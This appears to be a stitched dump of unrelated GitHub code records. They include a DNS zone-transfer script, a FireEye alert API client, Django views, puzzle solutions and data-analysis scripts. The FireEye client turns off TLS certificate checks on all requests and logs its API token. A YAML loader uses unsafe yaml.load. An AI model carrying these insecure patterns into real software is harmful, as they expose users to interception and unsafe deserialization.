self.now.strftime(\"%Y%m%d%H%M%S\") + \"_\" + nameserver + \".zone\")\n\t\tlogging.info(\"Write zonefile to \" + filename)\n\t\tfile_handler = open( filename, \"w\" )\n\t\tfile_handler.write(\n\t\t\tdig_output\n\t\t)\n\t\tfile_handler.close()\n \t\n\tdef transfer(self):\n\t\tfor zone in zoneconfig.ZONE:\n\t\t\tzone_data = self.get_dig_axfr_output(zone,zoneconfig.ZONE[zone])\n\t\t\tif self.zone_transfer_succeeded(zone_data):\n\t\t\t\tself.write_dig_output(zone, zoneconfig.ZONE[zone], zone_data)\n\t\t\t\t\n\n\t\n\n\n\nif __name__ == \"__main__\":\n\ta = Zonetransfer()\n\ta.transfer()\n\n\n","repo_name":"samuelpulfer/tld-analysis","sub_path":"bin/zonetransfer.py","file_name":"zonetransfer.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74728523742","text":"\"\"\" Solution to Day 14\n\nfrom: http://adventofcode.com/2016/day/14\n\n--- Part Two ---\n\nOf course, in order to make this process even more secure, you've also implemented key stretching.\n\nKey stretching forces attackers to spend more time generating hashes. Unfortunately, it forces\neveryone else to spend more time, too.\n\nTo implement key stretching, whenever you generate a hash, before you use it, you first find the\nMD5 hash of that hash, then the MD5 hash of that hash, and so on, a total of 2016 additional\nhashings. Always use lowercase hexadecimal representations of hashes.\n\nFor example, to find the stretched hash for index 0 and salt abc:\n\nFind the MD5 hash of abc0: 577571be4de9dcce85a041ba0410f29f.\nThen, find the MD5 hash of that hash: eec80a0c92dc8a0777c619d9bb51e910.\nThen, find the MD5 hash of that hash: 16062ce768787384c81fe17a7a60c7e3.\n...repeat many times...\nThen, find the MD5 hash of that hash: a107ff634856bb300138cac6568c0f24.\nSo, the stretched hash for index 0 in this situation is a107ff.... In the end, you find the original\nhash (one use of MD5), then find the hash-of-the-previous-hash 2016 times, for a total of 2017 uses\nof MD5.\n\nThe rest of the process remains the same, but now the keys are entirely different. Again for salt\nabc:\n\nThe first triple (222, at index 5) has no matching 22222 in the next thousand hashes.\nThe second triple (eee, at index 10) hash a matching eeeee at index 89, and so it is the first key.\nEventually, index 22551 produces the 64th key (triple fff with matching fffff at index 22859.\nGiven the actual salt in your puzzle input and using 2016 extra MD5 calls of key stretching, what\nindex now produces your 64th one-time pad key?\n\"\"\"\n\nimport hashlib\nimport re\n\nclass StretchedHasher(object):\n \"\"\"Class for generating a stretched hash, with internal caching for speed!\"\"\"\n def __init__(self):\n self.cache = dict()\n\n def generate_hash(self, salt):\n \"\"\"Return the result of hashing the salt with MD5 2017 times\"\"\"\n\n # check for cache hit\n if salt in self.cache.keys():\n return self.cache[salt]\n\n if len(self.cache.keys()) >= 1000:\n # clean up the salt with the lowest index in the cache to optimize space\n del self.cache[sorted(self.cache.keys(), key=lambda salt: int(re.findall(r'[0-9]+', salt)[0]))[0]]\n\n stretched_hash = hashlib.md5(str.encode(salt)).hexdigest()\n for i in range(0, 2016):\n stretched_hash = hashlib.md5(str.encode(stretched_hash)).hexdigest()\n\n # add computed hash to the cache\n self.cache[salt] = stretched_hash\n\n return stretched_hash\n\ndef generates_key(salt, index, hasher):\n \"\"\"Returns true if the stretched hash of salt and the index contains one character three times\n in a row, and one of the next 1000 stretched hashes with the same salt and an increasing index\n contains the same character five times in a row\"\"\"\n starting_hash = hasher.generate_hash(salt + str(index))\n match = re.search(r'([a-z0-9])\\1\\1', starting_hash)\n if match is None:\n return (False, hasher)\n repeat_target = match[1] + match[1] + match[1] + match[1] + match[1]\n for i in range(index + 1, index + 1001):\n new_hash = hasher.generate_hash(salt + str(i))\n if repeat_target in new_hash:\n return (True, hasher)\n return (False, hasher)\n\n\ndef main():\n \"\"\"Execution of solution\"\"\"\n salt = 'abc'\n index = 0\n key_count = 0\n hasher = StretchedHasher()\n while key_count < 64:\n # print(\"Checking index \" + str(index))\n result = generates_key(salt, index, hasher)\n hasher = result[1]\n if result[0]:\n key_count += 1\n index += 1\n print(index - 1)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kmcginn/advent-of-code","sub_path":"2016/day14/one_time_pad2.py","file_name":"one_time_pad2.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30781946201","text":"# vim: sw=4:ts=4:et:cc=120\n#\n\n#\n# utility routines for dealing with FireEye's API\n#\n\nimport base64\nimport datetime\nimport functools\nimport inspect\nimport io\nimport logging\nimport os, os.path\nimport re\nimport zipfile\n\nimport requests\n\nimport saq\nfrom saq.util import format_iso8601\n\n# the \"duration\" for getting alerts seems to be hardcoded to these possible values\nVALID_DURATIONS = { 1: '1_hour', \n 2: '2_hours',\n 6: '6_hours',\n 12: '12_hours',\n 24: '24_hours',\n 48: '48_hours', }\n\n# valid \"malware object types\" according to fireeye\n\nDOMAIN_MATCH = 'domain_match'\nMALWARE_CALLBACK = 'malware_callback'\nMALWARE_OBJECT = 'malware_object'\nWEB_INFECTION = 'web_infection'\nINFECTION_MATCH = 'infection_match'\n\nVALID_MALWARE_OBJECT_TYPES = [\n DOMAIN_MATCH,\n MALWARE_CALLBACK,\n MALWARE_OBJECT,\n WEB_INFECTION,\n INFECTION_MATCH,\n]\n\n# various keys in the fireeye json data\nKEY_ALERT = 'alert'\nKEY_EXPLANATION = 'explanation'\nKEY_ACTION = 'action'\nKEY_PRODUCT = 'product'\nKEY_MALWARE_DETECTED = 'malwareDetected'\nKEY_MALWARE = 'malware'\nKEY_NAME = 'name'\nKEY_SRC = 'src'\nKEY_SMTP_MAIL_FROM = 'smtpMailFrom'\nKEY_SMTP_MESSAGE = 'smtpMessage'\nKEY_SUBJECT = 'subject'\nKEY_OCCURRED = 'occurred'\nKEY_MD5 = 'md5Sum'\nKEY_SHA256 = 'sha256'\nKEY_DST = 'dst'\nKEY_SMTP_TO = 'smtpTo'\nKEY_IP = 'ip'\nKEY_ID = 'id'\nKEY_UUID = 'uuid'\nKEY_TYPE = 'type'\nKEY_URL = 'url'\n\nKEY_ARTIFACTS_INFO_LIST = 'artifactsInfoList'\nKEY_ARTIFACT_TYPE = 'artifactType'\nKEY_ARTIFACT_NAME = 'artifactName'\n\nARTIFACT_TYPE_RAW_EMAIL = 'raw_email'\n\ndef require_api_token_generator(func):\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n try:\n self.acquire_api_token()\n yield from func(self, *args, **kwargs)\n except requests.exceptions.HTTPError as e:\n # 404 - data isn't there\n if e.response.status_code != 404 and (400 <= e.response.status_code <= 499):\n self.acquire_api_token(reset=True)\n yield from func(self, *args, **kwargs)\n else:\n raise e\n\n return wrapper\n\ndef require_api_token(func):\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n try:\n self.acquire_api_token()\n return func(self, *args, **kwargs)\n except requests.exceptions.HTTPError as e:\n if e.response.status_code != 404 and (400 <= e.response.status_code <= 499):\n self.acquire_api_token(reset=True)\n return func(self, *args, **kwargs)\n else:\n raise e\n\n return wrapper\n\ndef require_api_token_for_generator(func):\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n try:\n self.acquire_api_token()\n result = func(self, *args, **kwargs)\n if isinstance(result, types.GeneratorType):\n yield from result\n else:\n return result\n except requests.exceptions.HTTPError as e:\n if 400 <= e.response.status_code <= 499:\n self.acquire_api_token(reset=True)\n result = func(self, *args, **kwargs)\n if isinstance(result, types.GeneratorType):\n yield from result\n else:\n return result\n\n return wrapper\n\nclass FireEyeAPIClient(object):\n def __init__(self, host, user, password):\n self.fe_host = host\n self.fe_user_name = user\n self.fe_password = password\n self.api_token = None\n\n def acquire_api_token(self, reset=False):\n if reset:\n self.api_token = None\n\n if self.api_token is not None:\n return self.api_token\n\n logging.debug(f\"logging into fireeye api with username {self.fe_user_name}\")\n headers={ 'Authorization': 'Basic {}'.format(base64.b64encode(f'{self.fe_user_name}:{self.fe_password}'.encode()).decode()), }\n response = requests.post(f'https://{self.fe_host}/wsapis/v2.0.0/auth/login?',\n verify=False, # <-- XXX fix\n headers=headers)\n\n response.raise_for_status()\n\n self.api_token = response.headers['X-FeApi-Token']\n logging.debug(f\"got api token {self.api_token}\")\n return self.api_token\n\n def close(self):\n if self.api_token is None:\n return \n\n headers = { \n 'X-FeApi-Token': self.api_token,\n }\n\n response = requests.post(f'https://{self.fe_host}/wsapis/v2.0.0/auth/logout',\n verify=False, # <-- XXX fix\n headers=headers)\n\n response.raise_for_status()\n logging.debug(f\"logged out api key {self.api_token}\")\n\n @require_api_token_generator\n def get_alerts(self, start_time, duration):\n assert isinstance(start_time, datetime.datetime)\n assert isinstance(duration, int)\n\n if duration not in VALID_DURATIONS:\n raise ValueError(f\"invalid duration for fireeye get_alerts: {duration}\")\n\n duration_text = VALID_DURATIONS[duration]\n start_time = format_iso8601(start_time)\n\n headers = { \n 'X-FeApi-Token': self.api_token,\n 'Accept': 'application/json' }\n\n response = requests.get(f'https://{self.fe_host}/wsapis/v2.0.0/alerts?start_time={start_time}&duration={duration_text}',\n params={\n 'info_level': 'extended',\n },\n verify=False, # <-- XXX fix\n headers=headers)\n\n response.raise_for_status()\n json_result = response.json()\n\n if KEY_ALERT not in json_result:\n logging.error(f\"missing {KEY_ALERT} in fireeye json result\")\n\n for alert in json_result[KEY_ALERT]:\n yield alert\n\n @require_api_token\n def get_alert(self, alert_id):\n assert isinstance(alert_id, int) or (isinstance(alert_id, str) and int(alert_id))\n \n headers = { \n 'X-FeApi-Token': self.api_token,\n 'Accept': 'application/json' }\n\n response = requests.get(f'https://{self.fe_host}/wsapis/v2.0.0/alerts/alert/{alert_id}',\n params={ 'info_level': 'extended' },\n verify=False, # <-- XXX fix\n headers=headers)\n\n response.raise_for_status()\n return response.json()\n\n @require_api_token\n def get_artifacts_by_uuid(self, target_dir, alert_uuid):\n \"\"\"Returns a tuple of (dict, str) where dict is the JSON for the artifact metadata\n and str is the path to the zip file that contains the artifacts.\"\"\"\n\n # first download the metadata of what's available for this alert id\n headers = { \n 'X-FeApi-Token': self.api_token,\n 'Accept': 'application/json' }\n\n response = requests.get(f'https://{self.fe_host}/wsapis/v2.0.0/artifacts/{alert_uuid}/meta',\n verify=False, # <-- XXX fix\n headers=headers)\n\n response.raise_for_status()\n json_result = response.json()\n\n if len(json_result[KEY_ARTIFACTS_INFO_LIST]) == 0:\n logging.debug(f\"no artifacts listed for {alert_uuid}\")\n return json_result\n\n headers = { \n 'X-FeApi-Token': self.api_token }\n #'Accept': 'application/octet-stream' }\n\n response = requests.get(f'https://{self.fe_host}/wsapis/v2.0.0/artifacts/{alert_uuid}',\n stream=True,\n verify=False, # <-- XXX fix\n headers=headers)\n\n response.raise_for_status()\n\n zip_path = os.path.join(target_dir, f'fe_artifacts_{alert_uuid}.zip')\n with open(zip_path, 'wb') as fp:\n for buffer in response.iter_content(io.DEFAULT_BUFFER_SIZE):\n fp.write(buffer)\n\n logging.info(f\"saved fireeye artifacts for {alert_uuid} to {zip_path}\")\n\n try:\n zip_fp = zipfile.ZipFile(zip_path)\n for artifact_entry in json_result[KEY_ARTIFACTS_INFO_LIST]:\n file_name = artifact_entry[KEY_ARTIFACT_NAME]\n file_type = artifact_entry[KEY_ARTIFACT_TYPE]\n logging.debug(f\"extracting {file_name} type {file_type} from {zip_path}\")\n try:\n zip_fp.extract(file_name, path=target_dir)\n except KeyError as e:\n logging.error(f\"file {file_name} does not exist in the zip file {zip_path}\")\n continue\n except zipfile.BadZipFile as e:\n logging.error(f\"fireeye artifact file {zip_path} for {alert_uuid} is bad: {e}\")\n\n os.remove(zip_path)\n return json_result\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n try:\n self.close()\n except Exception as e:\n logging.error(f\"attempt to close fireeye connection failed: {e}\")\n return False\n","repo_name":"ace-ecosystem/ACE","sub_path":"saq/fireeye.py","file_name":"fireeye.py","file_ext":"py","file_size_in_byte":8890,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"7"} +{"seq_id":"15196282671","text":"import sys\nimport subprocess\n\ndef clip(output):\n process = subprocess.Popen('pbcopy', env={'LANG': 'en_US.UTF-8'}, stdin=subprocess.PIPE)\n process.communicate(output.encode())\n\n# takes the argument from your terminal, stores it in a variable, splits that variable by '?source' (the point where Medium knows you're clicking this link from your email)\n\nlink = sys.argv[1]\n\nlink = link.split('?source')\n\n# stores the basic link to the article\n\nfinal_link = link[0]\n\n# copies the link to your clipboard so you can directly paste it in your browser\n\nclip(final_link)\n","repo_name":"nandanv2702/PersonalProjects","sub_path":"medium.py","file_name":"medium.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"11331234033","text":"from django.conf import settings\n\nfrom django.views.generic.simple import direct_to_template\nfrom django.conf.urls.defaults import patterns, url, include\n\n\n#from django.views.generic.simple import direct_to_template\n\n\nurlpatterns = patterns('',\n url(r'^$', direct_to_template, {\n 'template': 'index.html'}),\n url(r'^', include('debug_toolbar_htmltidy.urls'))\n)\n\nif settings.DEBUG:\n urlpatterns += patterns('',\n (r'^media/(.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT,\n }))\n","repo_name":"mklymyshyn/django-dtpanel-htmltidy","sub_path":"example_htmltidy/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"7"} +{"seq_id":"2082884911","text":"import yaml\nimport os\n\n\n# 读取yaml类型的配置文件\ndef read_data(filepath):\n \"\"\"\n 读取yaml类型的配置文件\n :param filepath: yaml文件的路径\n :return: 返回读取到的数据\n \"\"\"\n fs = open(filepath, \"r\", encoding=\"utf-8\")\n return yaml.load(fs)\n\n\nif __name__ == '__main__':\n filepath = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"testdata\", \"data_登录.yaml\")\n rd = read_data(filepath)\n print(rd[\"login\"][\"user\"])","repo_name":"Owen-ET/TX-Class","sub_path":"Desktop/GitTest/2021_SQM_Project/B2B_UI_Automate_Code/study_web_unit/common/handle_yaml.py","file_name":"handle_yaml.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"38433196598","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Mental Health Survey in Tech - Data Exploration and Cleaning\n\n# This dataset is from a 2014 survey that measures attitudes towards mental health and frequency of mental health disorders in the tech workplace. \n# **Source**: https://www.kaggle.com/osmi/mental-health-in-tech-survey\n# \n# In this workshop we don't have enough time to go through a full tutorial of writing cleaner code, but we will review a few tips:\n# \n# - **Tip 1**: Refactoring code for resuability and separation of concerns\n# - **Tip 2**: Auto-save artifacts (data, tables, charts, etc) and adding time-stamps \n# \n# **Run cells from 1 to 14 (Tip 1: Refactoring)**\n\n# In[1]:\n\n\nimport pandas as pd\nimport altair as alt\nfrom datetime import date\n#alt.themes.enable('latimes')\nget_ipython().run_line_magic('load_ext', 'watermark')\nget_ipython().run_line_magic('watermark', '--iversions -w -v -u -d -m')\n\n\n# ## Read data in\n\n# In[2]:\n\n\ntech = pd.read_csv('../data/mental_health_tech_data.csv', sep=',')\ntech.head(2)\n\n\n# ## Dataset missing values\n\n# In[3]:\n\n\ntech.isnull().sum()\n\n\n# In[4]:\n\n\ntech_d = tech.dropna(axis='columns')\ntech_d.shape\n\n\n# In[5]:\n\n\ntech_d.head(2)\n\n\n# In[6]:\n\n\ntech_d.isnull().sum()\n\n\n# ## Select and clean features\n\n# In[7]:\n\n\n# we will drop some features because require too much pre-processing for our current purposes\nto_drop = ['Timestamp', 'no_employees', 'Gender', 'Country'] \ntech_d = tech_d.drop(to_drop, axis=1)\n\n\n# In[8]:\n\n\n# we reduced the dataset to 19 features\ntech_d.shape \n\n\n# In[9]:\n\n\n# we have only one quantitative variable\ntech_d.describe()\n\n\n# ## \n\n# The values of age do not make sense. Looks like wehave negative values and values over 100\n# Let's clean that up a bit\n\n# In[10]:\n\n\n# keep ages <= 100 AND >= 15\ntech_d = tech_d[(tech_d['Age'] <= 100) & (tech_d['Age'] >= 15)] \ntech_d.describe()\n\n\n# In[11]:\n\n\n# check balance of target feature\ntech_d['treatment'].value_counts()\n\n\n# ## Explore variables\n\n# In[12]:\n\n\n# for real value variables histograms work great\nhist_1 = alt.Chart(tech_d).mark_bar().encode(\n x='Age',\n y='count()')\nhist_1\n\n\n# In[13]:\n\n\n# for categorical variables we use counts is a good idea\nbar_1 = alt.Chart(tech_d).mark_bar().encode(\n x='count()',\n y='treatment:N')\nbar_1\n\n\n# ## Tip 1: Refactoring code\n# \n# At this point we realize that we need to create a reusable function if we want to continue doing multiple similar plots. We need to change the structure of the code maintaining its behavior. This is what we call **'refactoring'**. For instance, if we want to generate the same chart multiple times changing the variable, we can do something like this:\n\n# In[14]:\n\n\ndef plot_cat(variable: str) -> 'Chart':\n '''plot categorical variables\n Parameters:\n variable: variable name \n ---\n Returns:\n Altair bar chart\n '''\n chart = alt.Chart(tech_d).mark_bar().encode(\n x='count()',\n y=variable,\n color=alt.Color(variable, legend=None))\n return chart\n\n\n# You may notice that I added a `docstring` documenting both **what goes in**, the `Parameters`, and what **goes out**, the `Return` statement. Adding `docstring` are a way to document the logic of the function, which facilitates future use and debugging.\n# \n# Below we use our `plot_cat` function to create a dashboard of bar-charts\n\n# In[15]:\n\n\n# we can concatenate charts together pretty easily\npanel_chart1 = (plot_cat('family_history') | plot_cat('remote_work')) & (plot_cat('care_options') | plot_cat('anonymity')) \npanel_chart1\n\n\n# Now let's plot the same variables grouped by treatment (target).\n\n# In[16]:\n\n\nbar_2= alt.Chart(tech_d).mark_bar().encode(\n x='count()',\n y='family_history',\n color='treatment')\nbar_2\n\n\n# Nice, now we can **refactor** the code as before to make multiple plots.\n\n# In[17]:\n\n\ndef plot_grouped_cat(variable:str)-> 'Chart':\n chart =alt.Chart(tech_d).mark_bar().encode(\n x='count()',\n y=variable,\n color=alt.X('treatment:N'))\n return chart\n\n\n# In[18]:\n\n\npanel_chart2 = (plot_grouped_cat('family_history') | plot_grouped_cat('remote_work')) & (plot_grouped_cat('care_options') | plot_grouped_cat('anonymity'))\npanel_chart2\n\n\n# ## Tip 2: saving and time-stamping artifacts\n# \n# **Automate the saving of artifacts**, like post-processed data, figures, and others, can save you a lot of typing and time. It also allows to run your code beginning to end with confidence. **Explicitly time-stamping your artifacts** can help you to easily identify different versions of your analysis. Images can add up to large directories, so be mindful before commiting to git/GitHub. One option is to add your results directory to the .gitignore file (after all, your code can reproduce them automatically!).\n\n# In[19]:\n\n\ndate_stamp = date.today().strftime('%Y-%b-%d')\npath = '../results'\nhist_1.save(f'{path}/hist_1_{date_stamp}.png')\nbar_1.save(f'{path}/bar_1_{date_stamp}.png')\nbar_2.save(f'{path}/bar_2_{date_stamp}.png')\npanel_chart1.save(f'{path}/panel_chart_1_{date_stamp}.png')\npanel_chart2.save(f'{path}/panel_chart_2_{date_stamp}.png')\n\n\n# ## Save Data\n\n# In[20]:\n\n\npath = '../data'\ntech_d.to_csv(f'{path}/mental_health_tech_data_post.csv')\n\n\n# ## Exporting to python script\n\n# If you like to do your exploratory data analysis in Jupyter, you may consider to save a .py version of your code in case other people don't use Jupyter. It also has the plus of being easy to run in the console (with a few changes, like commenting out magic commands like %watermark)\n","repo_name":"pabloinsente/sf_for_beh_ss","sub_path":"src/eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":5508,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"7"} +{"seq_id":"11946090017","text":"from django.shortcuts import render\nfrom.forms import ProductForm,RawProductForm\nfrom .models import Product\n# Create your views here.\n\ndef product_create_view(request):\n my_form = RawProductForm()\n if request.method == \"POST\":\n my_form = RawProductForm(request.POST)\n if my_form.is_valid():\n # now the data is good\n print(my_form.cleaned_data)\n Product.objects.create(**my_form.cleaned_data)\n else:\n print(my_form.errors)\n context = {\n \"form\": my_form\n }\n return render(request, \"products/product_create.html\", context)\n\n'''def product_create_view(request):\n #print (request.GET)\n #print(request.POST)\n my_new_title=request.POST.get('title')\n print(my_new_title)\n context = {}\n return render(request, \"products/product_create.html\", context)'''\n\n\n'''def product_create_view(request):\n form = ProductForm(request.POST or None)\n if form.is_valid():\n form.save()\n form=ProductForm()\n print(request.user)\n\n context={\n 'form': form\n }\n return render(request, \"products/product_create.html\", context)'''\n\n\n\ndef product_detail_view(request):\n obj=Product.objects.get(id=1)\n #'''context={\n # 'title': obj.title,\n # 'description': obj.description\n # }'''\n context={\n 'object': obj\n }\n return render(request, \"products/product_detail.html\", context)\n","repo_name":"amanjha18/django_project","sub_path":"trydjango/src/trydjango/products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"2238046803","text":"import numpy as np\n\ndef hatch_area():\n n = int(input())\n matrix = []\n\n for i in range(n):\n temp = [int(num) for num in input().split()]\n matrix.append(temp)\n\n max_hatch = np.min(matrix)\n\n for i in range(n):\n for j in range(n):\n if i >= n - 1 - j:\n if matrix[i][j] > max_hatch:\n max_hatch = matrix[i][j]\n\n print(max_hatch)\n","repo_name":"Annateranna/pytonProject_test","sub_path":"ekz512.py","file_name":"ekz512.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9835583329","text":"import os\n\nimport art\n\nfrom revisport.reporting import reporting_menu\nfrom revisport.favourites import favourites_menu\nfrom revisport.contact import contact_menu\nfrom revisport.quit import quit_menu\nfrom revisport.helpers import prepare_data\nfrom revisport.colors import GREEN, WHITE, CYAN, PURPLE, YELLOW\n\n\ndef welcome_message():\n \"\"\"\n Prints welcoming message when the program starts.\n \"\"\"\n print(art.text2art('ReVisPort'))\n print(\"Welcome to ReVisPort!\\n\")\n print(\"It has never been easy to create simple reports.\")\n print(\n \"ReVisPort navigates you step by step to explore climate\",\n \"data for EU-countries.\")\n print(\n \"You can save interesting data\",\n \"insights to come back to them later on.\")\n print(GREEN)\n print(\"ReVisPort is getting ready ...\")\n\n return\n\n\ndef load_data(SHEET):\n \"\"\"\n Loads climate data which are used to generate a report.\n\n Args:\n SHEET(obj): Google sheet object where data are stored.\n \"\"\"\n return prepare_data(SHEET, 'owid-co2-data', 'filter')\n\n\ndef main_menu(SHEET, input_data):\n \"\"\"\n Prints main/welcome menu, a user should select from.\n\n Args:\n SHEET(obj): Google sheet object where data are stored.\n input_data(data frame): Data which are used to\n generate a report.\n\n Returns:\n False/True: True when the app should be closed.\n False when the app should return HOME.\n \"\"\"\n print(WHITE)\n print(\"---------\")\n print(\"HOME MENU\")\n print(\"---------\")\n print(CYAN)\n print(\"Please select an option from the menu below:\")\n print(\" 1: Reporting\")\n print(\" 2: Favourites\")\n print(\" 3: Contact\")\n print(' 0: Quit')\n\n while True:\n try:\n print(PURPLE + \"Enter your choice: \" + WHITE, end='')\n answer = int(input().strip())\n\n except ValueError:\n print(YELLOW + \"You did not enter a number.\\n\")\n continue\n\n if answer == 1:\n os.system('clear')\n print(GREEN + 'Reporting selected.')\n reporting_menu(SHEET, input_data)\n break\n elif answer == 2:\n os.system('clear')\n favourites_menu(SHEET, input_data)\n break\n elif answer == 3:\n os.system('clear')\n contact_menu(SHEET, input_data)\n break\n elif answer == 0:\n quit_menu(SHEET)\n return True\n else:\n print(\n YELLOW +\n \"Invalid choice, please enter a number between 0 and 3!\\n\"\n )\n\n return False\n","repo_name":"brodsa/re-vis-port","sub_path":"revisport/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7975792644","text":"import csv\r\n\r\nee = open(\"output6.txt\",'r',encoding='utf8')\r\nhh = open (\"H.txt\",'r',encoding='utf8')\r\nee1 = ee.readlines()\r\nhh1=hh.readlines()\r\nee.close()\r\nhh.close()\r\nee1=ee1[0].split(\", \")\r\nhh1=hh1[0].split(\"', '\")\r\nprint(len(ee1))\r\nprint(len(hh1))\r\n \r\nwith open('train.csv',encoding='utf8') as csv_file, open('train_1.csv', 'w', encoding='utf8', newline='') as write_obj:\r\n csv_reader = csv.reader(csv_file, delimiter=',')\r\n csv_writer = csv.writer(write_obj)\r\n line_count = 0\r\n for row in csv_reader:\r\n if line_count !=0:\r\n a = row[2]\r\n a=a.split()\r\n #print(a)\r\n b=\"\"\r\n for i in range(len(a)):\r\n dee=0\r\n for j in range(len(ee1)):\r\n if a[i]==ee1[j][1:-1]:\r\n b = b + \" \" + (hh1[j])\r\n dee+=1\r\n break\r\n if(dee==0):\r\n b= b+\" \" + \"undefined\"\r\n #print(b)\r\n row.append(b)\r\n csv_writer.writerow(row)\r\n line_count+=1\r\n print(line_count)\r\n\r\n","repo_name":"0xproflupin/DeepBhashan","sub_path":"dataset/csv_mapping_EnglishToHindi.py","file_name":"csv_mapping_EnglishToHindi.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"1163878897","text":"#After Chris's code\nfrom pyspark.ml.feature import VectorAssembler\nfrom pyspark.mllib.regression import LabeledPoint\nfrom pyspark.sql.functions import col\n\n\n# N Gram Features\n\ndf[\"unigram_overlap\"] = df.apply(lambda x: len(set(x[\"text_unigrams\"]) & set(x[\"hyp_unigrams\"])), axis = 1)\ndf[\"bigram_overlap\"] = df.apply(lambda x: len(set(x[\"text_bigrams\"]) & set(x[\"hyp_bigrams\"])), axis = 1)\ndf[\"trigram_overlap\"] = df.apply(lambda x: len(set(x[\"text_trigrams\"]) & set(x[\"hyp_trigrams\"])), axis = 1)\ndf[\"quadgram_overlap\"] = df.apply(lambda x: len(set(x[\"text_quadgrams\"]) & set(x[\"hyp_quadgrams\"])), axis = 1)\ndf[\"figram_overlap\"] = df.apply(lambda x: len(set(x[\"text_figrams\"]) & set(x[\"hyp_figrams\"])), axis = 1)\n\n# POS Features\n\n\n\n\n# Named Entity Features\n\n\n\n\n# Tree Features\n\n\n# Sentiment Features\n\n\n#Extra-unigram Features\ndf[\"hyp_extra\"]= df.apply(lambda x: len(set(x[\"hyp_unigrams\"]) - set(x[\"text_unigrams\"])), axis = 1)\ndf[\"text_extra\"]= df.apply(lambda x: len(set(x[\"text_unigrams\"]) - set(x[\"hyp_unigrams\"])), axis = 1)\n\n\n# After building features convert to sparkSQL dataframe\ndfs = sqlCtx.createDataFrame(df)\n\n#Machine Learning\nassembler = VectorAssembler(inputCols =[\"unigram_overlap\",\"bigram_overlap\",\"trigram_overlap\",\"quadgram_overlap\",\"figram_overlap\"],outputCol =\"outcome\")\n\ntransformed = assembler.transform(dfs)\n\nLPs =transformed.select(col(\"outcome\").alias(\"label\"),col(\"unigram_overlap\").alias(\"features\")).map(lambda row: LabeledPoint(row.label,row.features))\nrddLPs = dfs.map(lambda row: LabeledPoint(row[\"outcome\"],[row[-5:]]))\n(trainingData, testData) =rddLPs.randomSplit([0.7, 0.3])\nmodel = RandomForest.trainClassifier(trainingData, numClasses=2, categoricalFeaturesInfo={},\n numTrees=3, featureSubsetStrategy=\"auto\",\n impurity='gini', maxDepth=4, maxBins=32)\npredictions = model.predict(testData.map(lambda x: x.features))\nlabelsAndPredictions = testData.map(lambda lp: lp.label).zip(predictions)\ntestErr = labelsAndPredictions.filter(lambda x: x[0] != x[1]).count() / float(testData.count())\nprint('Test Error = ' + str(testErr))\n\n#Another Model\nmodel = GradientBoostedTrees.trainClassifier(trainingData,categoricalFeaturesInfo={}, numIterations=10)\npredictions = model.predict(testData.map(lambda x: x.features))\nlabelsAndPredictions = testData.map(lambda lp: lp.label).zip(predictions)\ntestErr = labelsAndPredictions.filter(lambda x: x[0] != x[1]).count() / float(testData.count())\nprint('Test Error = ' + str(testErr))\n# Similar performance.\n\n#Model for test dataset\n#Run the same pre processing and parsing steps\n#Building a model\nmodel = GradientBoostedTrees.trainClassifier(rddLPs,categoricalFeaturesInfo={},numIterations=10)\npredictions = model.predict(newData.map(lambda x: x.features))\n\n#Saving the model and the predictions\nmodel.save(sc, \"target/tmp/myGradientBoostingClassificationModel\")\npredicitons =predictions.coalesce(1)\npredictions.saveAsTextFile(\"Users/naresh/Downloads/Predictions\")\nprint('Test Error = ' + str(testErr))\n\n","repo_name":"nareshshah139/IE-Group-D-Term3","sub_path":"NLP/TextualEntailmentAssignment/Features.py","file_name":"Features.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"27169919267","text":"# Link: https://www.hackerrank.com/challenges/apple-and-orange/problem?isFullScreen=true&h_r=next-challenge&h_v=zen\n\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'countApplesAndOranges' function below.\n#\n# The function accepts following parameters:\n# 1. INTEGER s\n# 2. INTEGER t\n# 3. INTEGER a\n# 4. INTEGER b\n# 5. INTEGER_ARRAY apples\n# 6. INTEGER_ARRAY oranges\n#\n\n\ndef countApplesAndOranges(s, t, a, b, apples, oranges):\n # Write your code here\n applePosition = [apple+a for apple in apples]\n orangePosition = [orange+b for orange in oranges]\n\n appleCounter = 0\n orangeCounter = 0\n for i in range(len(applePosition)):\n if (applePosition[i] >= s and applePosition[i] <= t):\n appleCounter += 1\n for i in range(len(orangePosition)):\n if (orangePosition[i] >= s and orangePosition[i] <= t):\n 